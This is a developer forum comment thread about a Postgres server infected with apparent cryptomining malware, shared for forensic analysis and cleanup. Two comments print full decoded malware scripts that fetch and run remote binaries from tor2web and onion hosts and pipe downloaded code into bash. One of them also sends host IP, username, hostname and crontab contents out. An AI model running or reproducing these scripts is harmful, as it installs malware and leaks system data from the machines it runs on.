DEV Community

Cover image for Investigation into Postgres malware (hack?)

Investigation into Postgres malware (hack?)

sanchitsharma on March 20, 2020

A database machine I was handling got infected by a malware, potentially a crypto miner, via a feature in Postgres. This feature, due to our recent...
Read full post
Collapse
 
danielw profile image
Daniel Waller (he/him) • Edited

Hey!
Have you looked at the base64 encoded payload at all?

The long string that is being echoed is piped into base64 -d which decodes the base64 and the result is piped into bash for execution.

The decoded payload that is piped into bash is the following script (click here if gist doesn't load):

To correctly assess your situation and the impact this might have had on your systems and users you should definitely take a look to see what effects on your server and data this script might have had.
A very nice tool for this kind of forensic work is GCHQs CyberChef. It has lot's of functions for encoding and decoding different formats.

Collapse
 
cipharius profile image
Valts Liepiņš

For anyone else interested, here is the malicious script after base64 decode and some tidying up:

exec &>/dev/null

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

t=tencentxjy5kpccv

dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

for i in $dir /tmp /var/tmp /dev/shm /usr/bin ; do
  echo exit > $i/i && \
    chmod +x $i/i && \
    cd $i && \
    ./i && \
    rm -f i && \
    break;
done

x() {
  f=/int
  d=./$(date|md5sum|cut -f1 -d-)
  wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || \
    curl -m99 -fsSLkA- $1$f -o$d
  chmod +x $d;$d;rm -f $d
}

u() {
  x=/crn
  wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || \
    curl -m99 -fsSLkA- $1$x
}

for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
  if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
    x tencentxjy5kpccv.$h
  else
    break
  fi
done

if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
  (
    u $t.d2web.org ||
    u $t.onion.mn ||
    u $t.tor2web.io ||
    u $t.tor2web.to ||
    u $t.onion.to ||
    u $t.onion.in.net ||
    u $t.4tor.ml ||
    u $t.onion.glass ||
    u $t.civiclink.network ||
    u $t.tor2web.su ||
    u $t.onion.ly ||
    u $t.onion.pet ||
    u $t.onion.ws
  )|bash
fi
Collapse
 
sanchitsharma profile image
sanchitsharma

Thanks Valts, I have added a bit commented (whatever I could understand) version to post itself. Please comment if I might have done anything wrong there.

Collapse
 
sanchitsharma profile image
sanchitsharma

Thanks Daniel. Don't know why I missed the piping into base64 -d command. Never had seen that command so my brain missed it :D. This has become more interesting. Am looking into what is this script doing

Collapse
 
danielw profile image
Daniel Waller (he/him) • Edited

Nice! Hope it's nothing too serious.
I'm also using this corona isolation time to analyze a phishing attempt against me that took place a few weeks ago.
Guess I'll be having a series of articles up over the next days :D

Collapse
 
zspine profile image
M#3

Very interesting stuff! Thanks a lot for sharing your experience.....

Collapse
 
tiguchi profile image
Thomas Werner

Interesting article and nice investigation work! I just checked the CVE you linked to, and it mentions that the exploit only works by connecting as postgres superuser.

Could you figure out how that exploit was executed in your case? Was it a weak postgres password, or maybe a default installation password? What did you do to tighten your server security?

Collapse
 
sanchitsharma profile image
sanchitsharma

No Thomas, we couldn't figure out how the exploit was executed since we had a strong password in place even though the default postgres port was open. We setup the firewall rules as well as added entry to pg_hba files to allow only trusted machines the access

Collapse
 
luisomar3 profile image
Luis Omar

I know this is an old post, but in case you guys still wanted to know how the exploit was executed I'm going to leave this unit42.paloaltonetworks.com/pgmine....

And thank you again, the post and the comment turned out to be extremely helpful.

Cheers

Collapse
 
komorebisan profile image
komorebi • Edited

I had the same issue as well in three different isolated servers!

Thanks for the write up. I spend a couple of hours trying to figure out but still scratching my head as to where is the malware coming from.

Our postgresql is running in a docker environment along with a strong password. On top of it, I am only using it for development.

dev-to-uploads.s3.amazonaws.com/i/...

Do you have any suggestion on strengthening the security?

Collapse
 
nicotroia profile image
Nico Troia

Thanks for this post. I was hit as well and traced it using the steps above.
Here is the decoded contents of the hidden file pgsql/.systemd-service.sh

exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "7jmrbtrvkgcqkldzyob4kotpyvsgz546yvik2xv4rpnfmrhe4imxthqd")

sockz() {
n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su tor2web.io
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done
Enter fullscreen mode Exit fullscreen mode
Collapse
 
kalmenchia profile image
kalmen

Hi,
Thanks for the info,
i am facing the same malware attack, following up with the articles, try to patch the leak, not sure after you have deleted the files and folders, did the malware find it's way back again ?

I found that we need to delete the cron task as well ,
Scheduled Cron Jobs , for mine , it looks something like this,
by user postgre and run this command , /var/lib/postgresql/.systemd-service.sh > /dev/null 2>&1 &

I am trying to find out why and how it created itself under my cron task.

And need to seal out all the potential leaks.
If any one of you have more info. or advice, please share, thanks a lot.

Collapse
 
mlopezcoria profile image
Mauricio López Coria

Excellent investigations. Thank you for sharing it. The same happened to a colleague and I'm trying to remove the malware files. By the way, can you list all files you had to delete?
Thank you, again.
Mauricio

Collapse
 
pkim2 profile image
pkim2

I just want to thank you as this was the clearest path for me to find why postgres was chewing up so many cycles. Not exactly the same (filenames, etc.), but the same pattern.

Thank you!

Collapse
 
luisomar3 profile image
Luis Omar

Hi, thanks a lot for this post. It really help understanding whats going on on my server.